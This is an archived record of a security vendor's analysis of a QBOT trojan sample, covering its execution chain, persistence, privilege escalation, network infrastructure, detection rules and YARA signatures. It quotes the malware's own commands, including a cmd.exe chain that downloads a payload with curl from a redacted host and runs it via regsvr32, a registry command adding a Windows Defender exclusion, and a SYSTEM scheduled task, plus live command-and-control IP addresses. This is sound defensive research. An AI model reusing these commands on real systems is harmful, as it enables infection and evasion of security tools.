{
	"id": "36427f9e-3e27-4d23-95ad-86105956b7cd",
	"created_at": "2026-04-06T00:19:40.94517Z",
	"updated_at": "2026-04-10T13:12:55.16278Z",
	"deleted_at": null,
	"sha1_hash": "6b06ab0f700389140f5a908976144c5d72c0536b",
	"title": "Exploring the QBOT Attack Pattern",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4712460,
	"plain_text": "Exploring the QBOT Attack Pattern\r\nBy Cyril François, Seth Goodwin, Andrew Pease\r\nPublished: 2022-08-22 · Archived: 2026-04-05 18:23:43 UTC\r\nKey Takeaways\r\nQBOT is a popular, actively developed, and full-featured trojan\r\nAdversary-controlled or owned infrastructure has been observed being used by numerous samples\r\nThe analyzed sample leverages multiple persistence and defense evasion mechanisms\r\nPreamble\r\nElastic Security Labs has been tracking REF3726, an attack pattern for the QBOT malware family. QBOT, also known as\r\nQAKBOT, is a prolific modular trojan that has been active since around 2007. QBOT’s loading mechanism makes it an\r\nattractive framework to threat actors and ransomware groups and has led to widespread infections of the family; targeting\r\nvictims across multiple verticals.\r\nThis research covers:\r\nExecution chain\r\nDefense evasion\r\nPersistence mechanisms\r\nPrivilege escalation\r\nNetwork events\r\nQBOT configuration extractor\r\nObserved tactics and techniques\r\nThrough this research, from static and dynamic analysis and Elastic telemetry, we uncovered 138 adversary-controlled or\r\nowned IP addresses. These IP addresses were linked to our sample and used to identify 339 additional associated malicious\r\nfiles. All artifacts are provided as STIX JSON and Elastic Common Schema (ECS) documents.\r\nFor information on the QBOT configuration extractor and malware analysis, check out our blog posts detailing\r\nthis:\r\nQBOT Configuration Extractor\r\nQBOT Malware Analysis\r\nAnalysis Environment\r\nWe selected a sample for analysis that we could statically and dynamically analyze. This process is commonly used to enrich\r\nboth types of analysis. For the dynamic analysis, the sample was detonated on a Windows 10 Enterprise VM running the\r\nElastic Endpoint, the Windows and Network Packet Capture Elastic Agent integrations, and an aggressive endpoint logging\r\npolicy. All events were shipped to our Elastic Cloud cluster and processed through the Elastic Security App. The Elastic\r\nSecurity Endpoint was configured for Alerting and Eventing only (no Prevention). Alerts were generated from Detection\r\nRules in the Security App and directly from the Elastic Security Endpoint default ruleset.\r\nExecution Chain\r\nhttps://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern\r\nPage 1 of 20\n\nThe following section will describe the observed execution chain for the Qbot malware sample. This includes events from\r\nInitial Execution to Defense Evasion to Persistence to Privilege Escalation.\r\nFull execution chain of the QBOT malware sample\r\nInitial Execution\r\nThe initial execution of the QBOT sample was observed in Elastic’s telemetry data (derived from @proxylife’s published\r\nresearch on QBOT).\r\n**\"C:\\Windows\\System32\\cmd.exe\" /q /c echo 'Ft' \u0026\u0026 ping REDACTED[.]com \u0026\u0026 MD \"\\\\vyr\" \u0026\u0026 curl.exe -o \\\\vyr\\v4QpQt.Nqv.e8xO\r\nNote, that the domains in the initial execution appear to be adversary-controlled, not adversary-owned; because of this, we\r\nare redacting them from our reporting.\r\nThe initial execution command does the following:\r\nC:\\Windows\\System32\\cmd.exe - this executes the Microsoft command interpreter\r\n/q - this switch of cmd.exe is to suppress echo output\r\n/c - this switch of cmd.exe is to pass a specific command string to the command interpreter\r\necho ‘Ft’ - this prints ‘Ft’ to STDOUT\r\n\u0026\u0026 - if the preceding commands were successful, continue and run the next series of commands\r\nping REDACTED[.]com - this performs a network connection test to an external domain using the Ping command\r\nMD “\\vyr” - this creates the vyr directory in the root directory ( **C:** )\r\ncurl.exe - this executes the data transfer tool, cURL\r\n-o \\vyr\\v4QpQt.Nqv.e8xO https://REDACTED[.]net/t8EKnIB/C.png - using the cURL tool, download and save the\r\nC.png file, from REDACTED[.]net, to the vyr directory with a filename of v4QpQt.Nqv.e8xO\r\necho \"sxF\" - this prints “sxF” to STDOUT\r\nregsvr32 \"\\vyr\\v4QpQt.Nqv.e8xO\" - uses the Microsoft Register Server ( regsvr32 ) to execute\r\nv4QpQt.Nqv.e8xO\r\nThe infection was prevented by Elastic Endpoint Security, so while the customer was protected, it stopped our ability to\r\nmonitor the next steps in the infection. To continue the analysis, we manually detonated the sample in our sandbox.\r\nManually Advancing Execution\r\nhttps://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern\r\nPage 2 of 20\n\nThis manual detonation picked up where Elastic Endpoint Security stopped the initial execution outlined above.\r\nTo allow the infection to continue, the sample was downloaded to our victim machine and executed manually using the\r\nMicrosoft Register Server ( regsvr32.exe ). The Register Server is a command-line utility to register and unregister DLLs\r\n(and other objects) in the Windows Registry.\r\n**regsvr32 -s c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a.dll**\r\nregsvr32 - this executes the Microsoft Register Server\r\n-s - this suppresses messages boxes\r\nNow that we have manually executed the Qbot DLL, we can track the execution chain, defense evasion, and persistence\r\ntechniques using the Elastic Security Solution.\r\nFrom within the Security Solution, we can expand the malware event generated by the Qbot DLL execution and explore the\r\ndetails. While we manually executed the malware and know much of this information, it is still helpful as an analyst when\r\nresearching live malware events.\r\nInitial alert in the Kibana Security Solution\r\nFrom here we can click on the “Analyze event” button to launch a timeline as a process tree that will show us how the\r\nmalware progressed and additional contextually relevant information.\r\nViewing the execution chain as a process tree\r\nNow that we’re in the Analyzer view, we can continue to step through the QBOT DLL execution chain.\r\nhttps://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern\r\nPage 3 of 20\n\nMicrosoft Registry Server used to execute the QBOT DLL\r\nThe Microsoft command interpreter was opened, and then the first regsvr32.exe process is started from\r\nC:\\Windows\\System32. Next, a child regsvr32.exe process is spawned from **C:\\Windows\\SysWOW64** with the same\r\ncommand-line arguments. The **SysWOW64** folder stores system files used to execute 32-bit processes on a 64-bit\r\nWindows operating system. This is expected because the Qbot DLL is a 32-bit file.\r\nOnce the DLL is executed by regsvr32.exe , it injects itself into the Explorer process.\r\nNext, an explorer.exe process is started then immediately self-injects shellcode. In addition to the shellcode injection, we\r\ncan see 17 file events, 32 network-based events, and 16 registry events observed. We’ll explore those further in the research.\r\nhttps://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern\r\nPage 4 of 20\n\nQBOT injecting into explorer.exe\r\nBefore proceeding, QBOT performs a check to prevent execution on systems that are using the following default system\r\nlanguages:\r\nLANG_RUSSIAN (Russia)\r\nLANG_BELARUSIAN (Belarus)\r\nLANG_KAZAK (Kazakhstan)\r\nLANG_ARMENIAN (Armenia)\r\nLANG_GEORGIAN (Georgia)\r\nLANG_UZBEK (Uzbekistan)\r\nLANG_TAJIK (Tajikistan)\r\nLANG_TURKMEN (Turkmenistan)\r\nLANG_UKRAINIAN (Ukraine)\r\nLANG_BOSNIAN (Bosnia)\r\nLANG_KYRGYZ (Kyrgyzstan)\r\nhttps://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern\r\nPage 5 of 20\n\nQBOT checking for specified default system languages\r\nDefense Evasion\r\nOnce the initial execution chain was completed, we observed attempts at defense evasion to protect the malware and\r\nfrustrate adversary eviction.\r\nAs noted above, Elastic Endpoint Security observed 17 file events from the injected explorer.exe. One of the 17 events\r\noccurred when the DLL copied itself from its current path to\r\nC:\\Users[REDACTED]\\AppData\\Roaming\\Microsoft\\Vybgeuye and named itself maonyo.dll. The maonyo.dll file is\r\nthe same file as the original Qbot DLL that was manually executed, verified by the SHA-256 hash.\r\nhttps://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern\r\nPage 6 of 20\n\nCreating of the maonyo.dll file\r\nThis defense evasion tactic will allow the QBOT DLL to continue to be executed even if the original file is deleted.\r\nIn addition to creating the maonyo.dll file, static malware analysis identified a thread called “watchdog”. The watchdog\r\nthread monitors for security instrumentation tools that are stored in a list and compared to running processes.\r\nEvery second, the watchdog thread will check to see if any of the running processes matches anything on the list.\r\nThe processes that are monitored for are common security analysis tools.\r\nhttps://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern\r\nPage 7 of 20\n\nWatchdog monitoring for security tooling\r\nIf any of the monitored processes are observed by the malware, it will proceed with randomly generated IP addresses instead\r\nof the hard coded ones in the resources section. If a monitored process is detected, an entry is made to the Windows Registry\r\nand the malware does not attempt to connect to the actual network infrastructure.\r\nOf note, the qak_proxy process identified in the monitored process list is unknown to us. It is possible that this is for an\r\nundisclosed security tool that monitors for QBOT network communications or when QBOT is acting as a proxy (which we\r\ndid not observe with our sample), but that is speculative in nature.\r\nThe static analysis showed that the malware is able to detect running antivirus by checking the list of running processes\r\nagainst known vendors binaries. Depending on the antivirus processes detected, the malware has different behaviors - as an\r\nexample, if Windows Defender is detected, it add its persistence folder to the Windows Defender exclusion path.\r\nhttps://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern\r\nPage 8 of 20\n\nWatchdog monitoring for antivirus processes\r\nQBOT adding a Windows Defender exclusion path\r\nThe reg.exe command does the following:\r\nC:\\Windows\\system32\\reg.exe - Microsoft Registry editor\r\nADD HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths - folder location in the registry for\r\nWindows Defender exclusions\r\n/f - adds the registry entry without prompting for confirmation\r\n/t REG_DWORD - specifies the type for the registry entry\r\n/v C:\\Users[REDACTED]\\AppData\\Roaming\\Microsoft\\Vybgeuye - specifies the name of the registry entry\r\n/d 0 - specifies the data for the new registry entry\r\nPersistence\r\nAfter the maonyo.dll file is created at the random location,\r\n**C:\\Users[REDACTED]\\AppData\\Roaming\\Microsoft\\Vybgeuye** (see the Defense Evasion section) in our example, the\r\nHKEY_USERS\\S-1-5-21-1047687853-4161697681-4019128061-\r\n1002\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\lnkotdhh and\r\nHKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Maonyoeve Windows Registry paths are created to execute the\r\nmaoyno.dll file every time the user with the SID **S-1-5-21-1047687853-4161697681-4019128061-1002** logs onto the\r\ninfected host. This SID is for the user that we used when detonating the DLL.\r\nWhile we did not observe QBOT spreading to other users' SIDs in the Windows Registry during dynamic\r\nanalysis, static analysis shows that this capability exists.\r\nWe were able to identify the registry path creations using Kibana (see below and in the Defense Evasion section), the\r\nsecurity researchers over at Trustwave’s Spider Labs published some great research about how to find the location of the\r\nhttps://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern\r\nPage 9 of 20\n\ncreated QBOT DLL by decrypting binary data stored at HKEY_CURRENT_USER\\SOFTWARE\\Microsoft[random\r\nfolder].\r\nLogon script added to the Windows Registry\r\nUsing the decryption tool that Spider Labs released as part of their research, we were able to manually validate what we\r\nwere seeing in Kibana.\r\nDecrypting binary data added to the Windows Registry\r\nPrivilege Escalation\r\nhttps://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern\r\nPage 10 of 20\n\nThe privilege escalation mechanism we observed was when the injected explorer.exe process spawns schtasks.exe and\r\ncreates a new scheduled task to run as the SYSTEM user.\r\nScheduled task creation\r\n**C:\\Windows\\system32\\schtasks.exe, /Create, /RU, NT AUTHORITY\\SYSTEM, /tn, ayttpnzc, /tr, regsvr32.exe -s \"c:\\Users\\[RED\r\nThe initial schtasks.exe command does the following:\r\n/Create - creates a scheduled task\r\n/RU NT AUTHORITY\\SYSTEM - sets the username and escalates privilege as the SYSTEM user\r\n/tn ayttpnzc - defines the task name\r\n/tr regsvr32.exe -s\r\n\"c:\\Users[REDACTED]\\Desktop\\7611346142\\c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a\r\n- specifies the task to run\r\nhttps://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern\r\nPage 11 of 20\n\n/sc ONCE - specifies the schedule frequency - once\r\n/Z - option that marks the task to be deleted after its execution\r\n/ST 15:21 - specifies the task start time (scheduled to start approximately 2-minutes after the scheduled task was\r\ncreated)\r\n/ET 15:33 - time to end the task if not completed\r\nNetwork Events\r\nAs we highlighted in the Preamble, there were 32 observed network events generated by the QBOT DLL. In addition to the\r\n32 events that we observed from the execution, we also identified 106 additional hard-coded IP addresses through static\r\nanalysis. This provided us with a total of 138 IP addresses from our Qbot sample.\r\nComparing the IP addresses against a corpus of malicious files, we identified 338 additional samples communicating with\r\nthe same network infrastructure.\r\nNetwork infrastructure observed in multiple samples\r\nWhen looking at the distribution of network and malware data points, not all of the samples are related to QBOT. Most of\r\nthe Win32DLL files are QBOT related, most of the Win32EXE files are associated with the EMOTET malware family, and\r\nthe Microsoft Office samples are related to generic malspam attachments.\r\nhttps://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern\r\nPage 12 of 20\n\nSamples by file type\r\nFurthermore, looking at the samples over time, we can see a change in how the network infrastructure was being used. On\r\nNovember 4, 2020, we see a change from predominantly EMOTET and generic samples to the first QBOT sample in our\r\ndataset on November 28, 2020. From there, Win32DLL files make up 97.1% of samples first observed after November\r\n2020.\r\nCollected samples over time\r\nAnalyzing Network Events\r\nhttps://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern\r\nPage 13 of 20\n\nWhen looking at the large number of IP addresses collected from both static and dynamic analysis, we wanted to put them\r\ninto a data analysis platform so that we could visualize them geographically and identify the network owners.\r\nTo do this, we used the ipinfo.io CLI tool. You can get an API key and download the tool for free.\r\nTo start, we collected our list of 138 IP addresses and then sent them through the ipinfo CLI tool as a bulk job, and output\r\nresults as JSON into a file called qbot.json.\r\n$ ipinfo bulk \u003e qbot.json\r\n** manual input mode **\r\nEnter all IPs, one per line:\r\n140.82.49.12\r\n144.202.2.175\r\n144.202.3.39\r\n149.28.238.199\r\n45.63.1.12\r\n45.76.167.26\r\n…truncated…\r\n{\r\n \"140.82.49.12\": {\r\n \"ip\": \"140.82.49.12\",\r\n \"hostname\": \"140.82.49.12.vultrusercontent.com\",\r\n \"city\": \"San Jose\",\r\n \"region\": \"California\",\r\n \"country\": \"US\",\r\n \"country_name\": \"United States\",\r\n \"loc\": \"37.3394,-121.8950\",\r\n \"org\": \"AS20473 The Constant Company, LLC\",\r\n \"postal\": \"95103\",\r\n \"timezone\": \"America/Los_Angeles\"\r\n },\r\n \"144.202.2.175\": {\r\n \"ip\": \"144.202.2.175\",\r\n \"hostname\": \"144.202.2.175.vultrusercontent.com\",\r\n \"city\": \"New York City\",\r\n \"region\": \"New York\",\r\n \"country\": \"US\",\r\n \"country_name\": \"United States\",\r\n \"loc\": \"40.7143,-74.0060\",\r\n \"org\": \"AS20473 The Constant Company, LLC\",\r\n \"postal\": \"10004\",\r\n \"timezone\": \"America/New_York\"\r\n },\r\n…truncated…\r\nNext, we need to change this into to a newline-delimited JSON (NDJSON) file so that we can quickly upload it into\r\nElasticsearch for analysis. To do this, we can use the tool Jquery, a command-line JSON processor.\r\n$ cat qbot.json | jq -c '.[]' \u003e qbot.ndjson\r\n{\"ip\":\"140.82.49.12\",\"hostname\":\"140.82.49.12.vultrusercontent.com\",\"city\":\"San Jose\",\"region\":\"California\",\"country\":\"US\"\r\n{\"ip\":\"144.202.2.175\",\"hostname\":\"144.202.2.175.vultrusercontent.com\",\"city\":\"New York City\",\"region\":\"New York\",\"country\"\r\n…truncated…\r\nhttps://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern\r\nPage 14 of 20\n\nNow that we have an NDJSON file, we can upload that into Elasticsearch through Kibana (or with Filebeat or the Elastic\r\nAgent). To do this, we’ll use the Elastic Container Project to spin up an entire Elastic Stack in Docker to do our analysis.\r\nOnce the containers have spun up, navigate to the Data Visualizer from within the Machine Learning menu. Select the\r\nNDJSON file that you created previously, and click the blue Import button.\r\nProvide an index name and then click on the Advanced tab. Under the Mappings settings, change loc to geo_point and then\r\nclick the blue Import button.\r\nSet \"loc\" to \"geo_point\"\r\nNow that we have the data loaded into Elasticsearch, you can do additional analysis, such as creating a map visualization.\r\nWhen looking at the distribution of network entities, we see them spread across the globe with most of them belonging to a\r\nvariety of Internet service providers.\r\nhttps://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern\r\nPage 15 of 20\n\nMap of all identified network infrastructure\r\nA caveat to the ISP-owned addresses, we did observe 7 IP addresses owned by Vultr. Vultr is a legitimate cloud hosting\r\nprovider and is also a favorite among adversaries because of the ability to upload custom ISO files that allow for a protected\r\ncommand \u0026 control server.\r\nNetwork infrastructure node information\r\nQBOT Configuration Extractor\r\nCollecting elements of malware events is a valuable analysis skill that can assist in the identification of additional\r\ncompromised hosts in a contested environment.\r\nElastic Security Labs has released an open source tool, under the Apache 2.0 license, that will allow for configurations to be\r\nextracted from QBOT samples. The tool can be downloaded here.\r\n$ qbot-config-extractor -f c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a\r\n=== Strings ===\r\n# Blob address: 0x100840a0\r\n# Key address: 0x10084040\r\n[0x0]: ProgramData\r\n[0xc]: /t4\r\n[0x10]: EBBA\r\n[0x15]: netstat -nao\r\nhttps://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern\r\nPage 16 of 20\n\n[0x22]: jHxastDcds)oMc=jvh7wdUhxcsdt2\r\n[0x40]: schtasks.exe /Create /RU \"NT AUTHORITY\\SYSTEM\" /SC ONSTART /TN %u /TR \"%s\" /NP /F\r\n...truncated...\r\n=== RESOURCE 1 ===\r\nKey: b'\\\\System32\\\\WindowsPowerShel1\\\\v1.0\\\\powershel1.exe'\r\nType: DataType.DOMAINS\r\n41.228.22.180:443\r\n47.23.89.62:995\r\n176.67.56.94:443\r\n103.107.113.120:443\r\n148.64.96.100:443\r\n47.180.172.159:443\r\n181.118.183.98:443\r\n...truncated...\r\nWe have asked Vultr to review our QBOT research and take appropriate actions in accordance with their customer Use\r\nPolicy, but have not received a response as of publication.\r\nObserved Adversary Tactics and Techniques\r\nTactics\r\nUsing the MITRE ATT\u0026CK® framework, tactics represent the why of a technique or sub-technique. It is the adversary’s\r\ntactical goal: the reason for performing an action.\r\nExecution\r\nPersistence\r\nPrivilege Escalation\r\nDefense Evasion\r\nCommand and Control\r\nTechniques / Sub Techniques\r\nTechniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.\r\nCommand and Scripting Interpreter: Windows Command Shell\r\nScheduled Task/Job: Scheduled Task\r\nBoot or Logon Autostart Execution: Registry Run Keys / Startup Folder\r\nValid Accounts: Default Accounts\r\nIngress Tool Transfer\r\nApplication Layer Protocol: Web Protocols\r\nIndicator Removal on Host: File Deletion\r\nDetections\r\nThe following detection rules and behavior prevention events were observed throughout the analysis of the QBOT sample.\r\nSuspicious Execution via Scheduled Task\r\nStartup or Run Key Registry Modification\r\nMemory Threat Detection Alert: Shellcode Injection\r\nhttps://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern\r\nPage 17 of 20\n\nMalicious Behavior Detection Alert: Suspicious String Value Written to Registry Run Key\r\nMalicious Behavior Detection Alert: Suspicious Scheduled Task Creation\r\nYARA\r\nElastic Security has created YARA rules to identify this activity.\r\nrule Windows_Trojan_Qbot_1 {\r\n meta:\r\n author = \"Elastic Security\"\r\n creation_date = \"2021-02-16\"\r\n last_modified = \"2021-08-23\"\r\n os = \"Windows\"\r\n arch = \"x86\"\r\n category_type = \"Trojan\"\r\n family = \"Qbot\"\r\n threat_name = \"Windows.Trojan.Qbot\"\r\n reference_sample = \"636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02\"\r\n strings:\r\n $a1 = { 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00 }\r\n $a2 = { FE 8A 14 06 88 50 FF 8A 54 BC 11 88 10 8A 54 BC 10 88 50 01 47 83 }\r\n condition:\r\n any of them\r\n}\r\nrule Windows_Trojan_Qbot_2 {\r\n meta:\r\n author = \"Elastic Security\"\r\n creation_date = \"2021-10-04\"\r\n last_modified = \"2022-01-13\"\r\n os = \"Windows\"\r\n arch = \"x86\"\r\n category_type = \"Trojan\"\r\n family = \"Qbot\"\r\n threat_name = \"Windows.Trojan.Qbot\"\r\n reference_sample = \"a2bacde7210d88675564106406d9c2f3b738e2b1993737cb8bf621b78a9ebf56\"\r\n strings:\r\n $a1 = \"%u.%u.%u.%u.%u.%u.%04x\" ascii fullword\r\n $a2 = \"stager_1.dll\" ascii fullword\r\n condition:\r\n all of them\r\n}\r\nrule Windows_Trojan_Qbot_3 {\r\n meta:\r\n author = \"Elastic Security\"\r\n creation_date = \"2022-03-07\"\r\n last_modified = \"2022-04-12\"\r\n os = \"Windows\"\r\n arch = \"x86\"\r\n category_type = \"Trojan\"\r\n family = \"Qbot\"\r\nhttps://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern\r\nPage 18 of 20\n\nthreat_name = \"Windows.Trojan.Qbot\"\r\n reference_sample = \"0838cd11d6f504203ea98f78cac8f066eb2096a2af16d27fb9903484e7e6a689\"\r\n strings:\r\n $a1 = { 75 C9 8B 45 1C 89 45 A4 8B 45 18 89 45 A8 8B 45 14 89 45 AC 8B }\r\n $a2 = \"\\\\stager_1.obf\\\\Benign\\\\mfc\\\\\" wide\r\n condition:\r\n any of them\r\n}\r\nrule Windows_Trojan_Qbot_4 {\r\n meta:\r\n author = \"Elastic Security\"\r\n creation_date = \"2022-06-07\"\r\n last_modified = \"2022-07-18\"\r\n os = \"Windows\"\r\n arch = \"x86\"\r\n category_type = \"Trojan\"\r\n family = \"Qbot\"\r\n threat_name = \"Windows.Trojan.Qbot\"\r\n reference_sample = \"c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a\"\r\n strings:\r\n $a1 = \"qbot\" wide\r\n $a2 = \"stager_1.obf\\\\Benign\\\\mfc\" wide\r\n $a3 = \"common.obf\\\\Benign\\\\mfc\" wide\r\n $a4 = \"%u;%u;%u;\"\r\n $a5 = \"%u.%u.%u.%u.%u.%u.%04x\"\r\n $a6 = \"%u\u0026%s\u0026%u\"\r\n $get_string1 = { 33 D2 8B ?? 6A 5A 5? F7 ?? 8B ?? 08 8A 04 ?? 8B 55 ?? 8B ?? 10 3A 04 ?? }\r\n $get_string2 = { 33 D2 8B ?? F7 75 F4 8B 45 08 8A 04 02 32 04 ?? 88 04 ?? ?? 83 ?? 01 }\r\n $set_key = { 8D 87 00 04 00 00 50 56 E8 ?? ?? ?? ?? 59 8B D0 8B CE E8 }\r\n $do_computer_use_russian_like_keyboard = { B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D }\r\n $execute_each_tasks = { 8B 44 0E ?? 85 C0 74 ?? FF D0 EB ?? 6A 00 6A 00 6A 00 FF 74 0E ?? E8 ?? ?? ?? ?? 83 C4 10\r\n $generate_random_alpha_num_string = { 57 E8 ?? ?? ?? ?? 48 50 8D 85 ?? ?? ?? ?? 6A 00 50 E8 ?? ?? ?? ?? 8B 4D ?? 8\r\n $load_base64_dll_from_file_and_inject_into_targets = { 10 C7 45 F0 50 00 00 00 83 65 E8 00 83 7D F0 0B 73 08 8B 45\r\n condition:\r\n 6 of them\r\n}\r\nReferences\r\nThe following were referenced throughout the above research:\r\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/decrypting-qakbots-encrypted-registry-keys/\r\nhttps://twitter.com/pr0xylife/status/1539601609730170882?s=20\u0026t=G-XR7ibeOO0nWCWajKWTKw\r\nhttps://github.com/drole/qakbot-registry-decrypt\r\nhttps://malpedia.caad.fkie.fraunhofer.de/details/win.emotet\r\nhttps://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot\r\nArtifacts\r\nArtifacts are also available for download in both ECS and STIX format in a combined zip bundle.\r\nhttps://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern\r\nPage 19 of 20\n\nSource: https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern\r\nhttps://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern\r\nPage 20 of 20",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern"
	],
	"report_names": [
		"exploring-the-qbot-attack-pattern"
	],
	"threat_actors": [
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434780,
	"ts_updated_at": 1775826775,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6b06ab0f700389140f5a908976144c5d72c0536b.pdf",
		"text": "https://archive.orkl.eu/6b06ab0f700389140f5a908976144c5d72c0536b.txt",
		"img": "https://archive.orkl.eu/6b06ab0f700389140f5a908976144c5d72c0536b.jpg"
	}
}